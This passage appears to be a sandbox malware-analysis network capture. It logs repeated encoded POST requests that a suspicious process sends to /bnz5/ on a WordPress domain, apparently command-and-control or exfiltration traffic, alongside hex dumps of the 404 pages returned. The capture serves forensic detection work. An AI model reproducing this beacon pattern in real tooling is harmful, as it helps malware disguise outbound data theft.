61 73 68 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 22 2c 22 6e 61 6d 65 22 3a 22 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 2c 22 64 65 73 63 72 69
                                                                                                      Data Ascii: 4000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v22.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - Wedgetech Flash</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Wedgetech Flash" /><meta property="og:site_name" content="Wedgetech Flash" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://wedgetechflash.co.ke/#website","url":"https://wedgetechflash.co.ke/","name":"Wedgetech Flash","descri
                                                                                                      Apr 16, 2024 12:01:36.347678900 CEST1289INData Raw: 70 74 69 6f 6e 22 3a 22 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 2c 22 70 6f 74 65 6e 74
                                                                                                      Data Ascii: ption":"","publisher":{"@id":"https://wedgetechflash.co.ke/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://wedgetechflash.co.ke/?s={search_term_string}"},"query-input":"required
                                                                                                      Apr 16, 2024 12:01:36.347696066 CEST1289INData Raw: 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65
                                                                                                      Data Ascii: /wedgetechflash.co.ke/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","sou
                                                                                                      Apr 16, 2024 12:01:36.347712994 CEST1289INData Raw: 62 5c 75 64 62 34 30 5c 75 64 63 37 66 22 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 6e 28 65 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32
                                                                                                      Data Ascii: b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElemen
                                                                                                      Apr 16, 2024 12:01:36.347732067 CEST1289INData Raw: 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65
                                                                                                      Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
                                                                                                      Apr 16, 2024 12:01:36.347748041 CEST1289INData Raw: 20 2e 61 6c 69 67 6e 77 69 64 65 2c 2e 61 73 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 61 6c 69 67 6e 77 69 64 65 20 2e 61 6c 69 67 6e 66 75 6c 6c 2c 2e 61 73 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e
                                                                                                      Data Ascii: .alignwide,.ast-no-sidebar .entry-content .alignwide .alignfull,.ast-no-sidebar .entry-content .alignwide .alignwide,.ast-no-sidebar .entry-content .wp-block-column .alignfull,.ast-no-sidebar .entry-content .wp-block-column .alignwide{width:
                                                                                                      Apr 16, 2024 12:01:36.347764969 CEST1289INData Raw: 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 34 70 78 20 73 6f 6c 69 64 20 23 35 35 35 64 36 36 3b 63 6f 6c 6f 72 3a 20 23 34 30 34 36 34 64 3b 7d 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61
                                                                                                      Data Ascii: der-bottom: 4px solid #555d66;color: #40464d;}:root{--ast-container-default-xlg-padding:6.67em;--ast-container-default-lg-padding:5.67em;--ast-container-default-slg-padding:4.34em;--ast-container-default-md-padding:3.34em;--ast-container-defau
                                                                                                      Apr 16, 2024 12:01:36.347780943 CEST1289INData Raw: 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 69 6e 6e 65 72 3a 68 6f 76 65 72 2c 2e 62 6c 6f 67 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 69 6e 6e
                                                                                                      Data Ascii: ast-article-post .ast-article-inner:hover,.blog .ast-article-post .ast-article-inner:hover{overflow:hidden;}h1,.entry-content h1{font-size:40px;font-size:2.6666666666667rem;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2.133
                                                                                                      Apr 16, 2024 12:01:36.347798109 CEST1289INData Raw: 63 6b 62 6f 78 22 5d 3a 66 6f 63 75 73 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 6e 67 65 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 39 38 30 38 64
                                                                                                      Data Ascii: ckbox"]:focus:checked,input[type=range]::-webkit-slider-thumb{border-color:#79808d;background-color:#79808d;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#79808d;border-color:#79808d;}.single
                                                                                                      Apr 16, 2024 12:01:36.347816944 CEST1289INData Raw: 6d 2c 2e 61 73 74 2d 68 65 61 64 65 72 2d 73 65 61 72 63 68 20 2e 61 73 74 2d 73 65 61 72 63 68 2d 6d 65 6e 75 2d 69 63 6f 6e 2e 61 73 74 2d 64 72 6f 70 64 6f 77 6e 2d 61 63 74 69 76 65 20 2e 73 65 61 72 63 68 2d 66 69 65 6c 64 3a 66 6f 63 75 73
                                                                                                      Data Ascii: m,.ast-header-search .ast-search-menu-icon.ast-dropdown-active .search-field:focus{transition:all 0.2s;}.search-form input.search-field:focus{outline:none;}.widget-title,.widget .wp-block-heading{font-size:21px;font-size:1.4rem;color:var(--ast


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      34192.168.2.54975337.61.232.138802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:37.734481096 CEST747OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.wedgetechflash.co.ke
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.wedgetechflash.co.ke
                                                                                                      Referer: http://www.wedgetechflash.co.ke/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 34 68 79 6b 6b 67 43 4d 50 5a 6c 54 68 58 64 69 45 58 6a 76 45 35 79 64 75 68 62 6b 34 66 47 48 58 4d 57 73 37 77 31 34 5a 42 41 59 52 43 6f 31 30 55 42 61 73 56 35 57 74 4c 77 2f 73 4b 66 51 41 7a 2f 79 42 4b 36 70 54 76 44 6a 4b 59 4b 44 4c 53 57 32 53 49 4d 69 46 4f 48 71 33 53 64 6f 52 56 4a 34 6e 74 50 48 34 63 31 42 61 31 76 4e 2b 58 63 4e 4e 6e 68 58 53 73 77 43 38 67 38 61 43 48 6a 6a 73 61 47 70 48 49 2f 61 63 4d 55 77 6c 6f 50 6b 6d 63 6b 73 32 4d 53 55 32 32 42 77 68 59 44 35 4e 32 30 2f 74 64 4a 77 7a 73 50 30 50 74 58 59 54 38 62 57 59 54 6d 39 66 2b 46 73 32 32 70 45 39 4b 77 6a 64 6a 43 42 7a 79 7a 63 32 33 31 6c 62 35 79 31 31 6c 32 33
                                                                                                      Data Ascii: gr=4hykkgCMPZlThXdiEXjvE5yduhbk4fGHXMWs7w14ZBAYRCo10UBasV5WtLw/sKfQAz/yBK6pTvDjKYKDLSW2SIMiFOHq3SdoRVJ4ntPH4c1Ba1vN+XcNNnhXSswC8g8aCHjjsaGpHI/acMUwloPkmcks2MSU22BwhYD5N20/tdJwzsP0PtXYT8bWYTm9f+Fs22pE9KwjdjCBzyzc231lb5y11l23
                                                                                                      Apr 16, 2024 12:01:40.110578060 CEST1289INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:01:37 GMT
                                                                                                      Server: Apache
                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                      Link: <https://wedgetechflash.co.ke/wp-json/>; rel="https://api.w.org/"
                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                      X-Endurance-Cache-Level: 0
                                                                                                      X-nginx-cache: WordPress
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 32 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 22 2c 22 6e 61 6d 65 22 3a 22 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 2c 22 64 65 73 63 72 69
                                                                                                      Data Ascii: 4000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v22.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - Wedgetech Flash</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Wedgetech Flash" /><meta property="og:site_name" content="Wedgetech Flash" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://wedgetechflash.co.ke/#website","url":"https://wedgetechflash.co.ke/","name":"Wedgetech Flash","descri
                                                                                                      Apr 16, 2024 12:01:40.110595942 CEST1289INData Raw: 70 74 69 6f 6e 22 3a 22 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 2c 22 70 6f 74 65 6e 74
                                                                                                      Data Ascii: ption":"","publisher":{"@id":"https://wedgetechflash.co.ke/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://wedgetechflash.co.ke/?s={search_term_string}"},"query-input":"required
                                                                                                      Apr 16, 2024 12:01:40.110630989 CEST1289INData Raw: 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65
                                                                                                      Data Ascii: /wedgetechflash.co.ke/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","sou
                                                                                                      Apr 16, 2024 12:01:40.110641003 CEST1289INData Raw: 62 5c 75 64 62 34 30 5c 75 64 63 37 66 22 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 6e 28 65 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32
                                                                                                      Data Ascii: b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElemen
                                                                                                      Apr 16, 2024 12:01:40.110651016 CEST1289INData Raw: 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65
                                                                                                      Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
                                                                                                      Apr 16, 2024 12:01:40.110661983 CEST1289INData Raw: 20 2e 61 6c 69 67 6e 77 69 64 65 2c 2e 61 73 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 61 6c 69 67 6e 77 69 64 65 20 2e 61 6c 69 67 6e 66 75 6c 6c 2c 2e 61 73 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e
                                                                                                      Data Ascii: .alignwide,.ast-no-sidebar .entry-content .alignwide .alignfull,.ast-no-sidebar .entry-content .alignwide .alignwide,.ast-no-sidebar .entry-content .wp-block-column .alignfull,.ast-no-sidebar .entry-content .wp-block-column .alignwide{width:
                                                                                                      Apr 16, 2024 12:01:40.110672951 CEST1289INData Raw: 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 34 70 78 20 73 6f 6c 69 64 20 23 35 35 35 64 36 36 3b 63 6f 6c 6f 72 3a 20 23 34 30 34 36 34 64 3b 7d 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61
                                                                                                      Data Ascii: der-bottom: 4px solid #555d66;color: #40464d;}:root{--ast-container-default-xlg-padding:6.67em;--ast-container-default-lg-padding:5.67em;--ast-container-default-slg-padding:4.34em;--ast-container-default-md-padding:3.34em;--ast-container-defau
                                                                                                      Apr 16, 2024 12:01:40.110682964 CEST1289INData Raw: 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 69 6e 6e 65 72 3a 68 6f 76 65 72 2c 2e 62 6c 6f 67 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 69 6e 6e
                                                                                                      Data Ascii: ast-article-post .ast-article-inner:hover,.blog .ast-article-post .ast-article-inner:hover{overflow:hidden;}h1,.entry-content h1{font-size:40px;font-size:2.6666666666667rem;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2.133
                                                                                                      Apr 16, 2024 12:01:40.110770941 CEST1289INData Raw: 63 6b 62 6f 78 22 5d 3a 66 6f 63 75 73 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 6e 67 65 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 39 38 30 38 64
                                                                                                      Data Ascii: ckbox"]:focus:checked,input[type=range]::-webkit-slider-thumb{border-color:#79808d;background-color:#79808d;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#79808d;border-color:#79808d;}.single
                                                                                                      Apr 16, 2024 12:01:40.110783100 CEST1289INData Raw: 6d 2c 2e 61 73 74 2d 68 65 61 64 65 72 2d 73 65 61 72 63 68 20 2e 61 73 74 2d 73 65 61 72 63 68 2d 6d 65 6e 75 2d 69 63 6f 6e 2e 61 73 74 2d 64 72 6f 70 64 6f 77 6e 2d 61 63 74 69 76 65 20 2e 73 65 61 72 63 68 2d 66 69 65 6c 64 3a 66 6f 63 75 73
                                                                                                      Data Ascii: m,.ast-header-search .ast-search-menu-icon.ast-dropdown-active .search-field:focus{transition:all 0.2s;}.search-form input.search-field:focus{outline:none;}.widget-title,.widget .wp-block-heading{font-size:21px;font-size:1.4rem;color:var(--ast


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      35192.168.2.54975437.61.232.138802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:40.473253965 CEST1764OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.wedgetechflash.co.ke
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.wedgetechflash.co.ke
                                                                                                      Referer: http://www.wedgetechflash.co.ke/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 34 68 79 6b 6b 67 43 4d 50 5a 6c 54 68 58 64 69 45 58 6a 76 45 35 79 64 75 68 62 6b 34 66 47 48 58 4d 57 73 37 77 31 34 5a 42 59 59 52 78 51 31 37 54 39 61 39 6c 35 57 6a 72 77 2b 73 4b 66 33 41 7a 6e 49 42 4b 32 66 54 73 37 6a 4b 36 53 44 65 57 36 32 48 59 4d 69 4e 75 48 72 35 79 64 39 52 55 35 30 6e 74 66 48 34 63 31 42 61 33 6e 4e 36 47 63 4e 42 48 68 49 56 73 77 4f 32 41 38 32 43 48 37 56 73 62 79 54 48 5a 66 61 64 73 45 77 32 37 72 6b 67 4d 6b 69 31 4d 53 63 32 32 4e 7a 68 63 71 41 4e 32 41 46 74 61 6c 77 78 37 69 2b 54 4e 6e 44 50 75 37 4e 4c 6b 6d 68 4b 61 4a 5a 31 67 6c 51 37 34 73 42 61 43 6d 6a 30 46 66 59 31 31 41 55 4d 4e 4f 57 38 51 71 38 75 30 35 65 56 64 4f 54 42 4b 4e 50 75 46 74 46 74 2b 79 49 43 65 35 33 38 4a 77 4f 64 73 68 45 30 72 6d 50 59 6e 4c 55 69 68 62 30 31 58 70 4d 78 35 6d 37 7a 30 53 61 6a 4f 66 4a 37 5a 58 69 4d 35 65 51 4b 5a 59 49 69 2b 72 73 43 2f 6e 76 48 69 57 4d 53 73 46 72 62 5a 35 77 54 55 44 67 44 58 75 31 64 35 52 41 4e 77 52 4c 58 47 52 4b 6f 4f 73 50 74 76 6e 63 46 42 6f 48 65 4f 51 61 74 70 6f 2b 78 64 68 4d 68 76 69 6d 66 32 63 6e 47 30 6d 51 47 74 4f 64 53 39 6e 69 6b 71 76 58 6d 62 54 56 4c 2b 56 30 64 35 4e 38 35 74 5a 72 47 7a 72 7a 6e 2b 77 63 6f 6a 68 6b 43 2b 4e 72 78 36 61 41 48 79 45 49 4d 31 59 59 66 53 63 64 73 53 32 43 6b 44 4a 4f 63 59 54 51 61 77 43 63 4d 54 67 71 38 6d 73 55 54 4b 61 35 39 37 38 65 72 36 57 53 2f 39 36 46 38 6e 39 55 45 2f 51 71 31 44 73 52 76 70 41 42 6f 43 4f 51 4e 6a 76 42 6f 66 4d 4a 4a 70 6d 6b 36 6f 55 61 49 6a 53 77 4c 76 74 37 51 49 61 76 36 57 36 72 68 79 6a 4d 32 6c 49 39 32 79 69 47 72 42 31 32 67 34 58 77 69 72 4a 4b 41 72 6f 78 5a 79 75 4c 35 52 6c 46 46 6a 31 50 47 36 74 2b 35 6e 57 52 45 74 59 53 61 76 51 73 39 54 31 65 34 76 30 70 68 38 61 37 2b 58 42 4f 6e 2f 76 4a 63 43 46 32 45 56 71 45 71 4a 69 50 6f 32 4c 44 42 57 42 41 39 39 6f 6a 6d 32 71 2b 66 52 43 77 39 6b 78 62 37 43 48 37 43 43 35 78 74 43 58 77 7a 48 2f 6f 61 30 31 49 61 53 4c 6d 56 62 5a 43 52 69 79 44 66 36 4d 44 71 75 4d 45 53 70 62 76 30 34 4a 59 41 37 33 71 6f 48 43 35 41 65 6f 46 47 2f 32 66 6a 4b 30 36 56 47 49 59 56 30 35 75 49 71 6e 4b 72 34 55 44 34 4f 6a 59 4c 51 69 38 56 67 47 2b 4f 76 72 56 49 31 4f 70 67 45 41 74 68 65 31 58 53 6f 58 45 55 54 2f 37 75 67 42 34 4a 4a 71 79 57 54 5a 43 55 79 6c 63 62 37 48 44 42 50 4a 64 43 48 61 30 4c 71 37 4a 31 36 49 76 6d 44 79 7a 4a 2f 59 6a 46 30 74 48 4a 66 47 51 53 5a 55 4c 4b 46 65 47 79 31 41 61 4f 74 55 2b 38 6e 58 30 73 2f 74 78 65 35 5a 42 52 62 6b 56 6b 61 50 52 51 45 65 59 57 67 37 72 36 54 53 53 37 41 75 6b 41 68 4c 36 43 64 49 79 5a 45 4c 2f 78 75 62 74 64 37 4d 43 43 59 75 6d 73 65 35 7a 36 4a 75 4b 47 77 58 7a 54 45 42 58 2b 47 74 6a 31 2b 64 59 37 76 5a 39 6b 64 31 33 31 2b 54 2b 6a 30 51 51 49 43 71 54 54 48 44 73 33 43 49 52 6e 52 68 77 75 7a 63 6a 4e 64 48 67 75 6d 66 75 6e 6f 34 50 34 51 34 58 36 69 69 57 71 32 61 6f 57 6f 6e 67 38 63 33 69 36 31 7a 4e 45 53 61 30 71 46 43 6d 52 44 32 50 79 58 79 43 4a 4c 4e 74 52 31 35 4e 6c 4d 77 46 54 76 6c 56 6c 4b 76 55 55 55 4f 61 47 4a 77 2f 51 36 46 71 30 65 50 2b 54 67 49 38 4a 42 6d 75 4b 36 6d 37 73 6a 63 6f 46 78 4e 74 56 57 49 69 31 43 58 72 76 42 6f 6a 57 41 69 50 50 4a 72 57 34 6b 31 70 47 37 68 76 57 73 71 61 6d 78 62 34 70 34 4f 42 2b 49 63 51 38 71 72 47 52 4d 36 6d 75 63 43 31 51 6f 53 6a 77 59 71 56 4b 51 77 71 57 62 57 68 69 78 75 35 35 65 43 5a 57 58 30 43 55 74 34 35 48 34 4b 45 75 2b 4b 43 71 59 79 68 64 7a 68 42 57 61 6e 2f 48 52 66 73 5a 48 44 65 76 4b 67 69 4d 33 71 42 4b 48 65 41 72 68 41 56 77 30 61 4f 7a 61 63 47 41 63 66 47 6e 51 61 4d 41 71 74 47 43 4a 77 52 31 56 38 59 33 4b 59 68 72 46 75 67 45 74 76 33 47 42 58 4e 2b 4d 59 2f 4a 35 56 73 4f 51 3d 3d
